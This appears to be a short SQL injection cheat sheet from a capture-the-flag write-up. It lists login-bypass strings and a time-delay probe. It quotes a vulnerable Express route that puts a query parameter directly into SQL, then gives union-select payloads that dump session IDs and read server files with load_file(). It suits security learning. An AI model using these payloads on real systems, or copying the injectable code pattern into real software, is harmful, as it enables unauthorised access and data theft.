SQL Cheat
Bypass Login
admin' --
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'/*
admin') or ('1'='1
' waitfor delay '0:0:20' --WAF
Using / at username, and password as state above.
SQL in App (Not DB)
Sessions Cookies
app.get("/searchcookies", isAuthenticated, async (req, res, next) => {
cookies = req.query.cookies;
const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`;
pool.query(query, (err, result) => {
if(err){
return next(err)
}
return res.status(200).render("index", {cookies: result || []})
});
})
try {
const adminCookieData = {"cookie":{"originalMaxAge":86400000,"expires":"2024-04-20T19:21:29.400Z","httpOnly":true,"path":"/", "sameSite": "lax"},"username":"Admin","isAdmin":true};
const sessionId = 'WSUCTF{F4ke_Flag}';
const expirationTimestamp = 1712172179;
const serializedData = JSON.stringify(adminCookieData);
const query = `INSERT INTO sessions (session_id, data, expires) VALUES (?, ?, ?)`;The above code shows SQL Injection at /searchcookie where the cookies parameter is directly inserted into the query. The flag being stored in another tables name as sessions.
" union select 1,(select group_concat(session_id) from sessions),3-- -App/File
Utilize load_file() function to read files.
" union select 1,load_file('/app/src/app.js'),3-- -
Last updated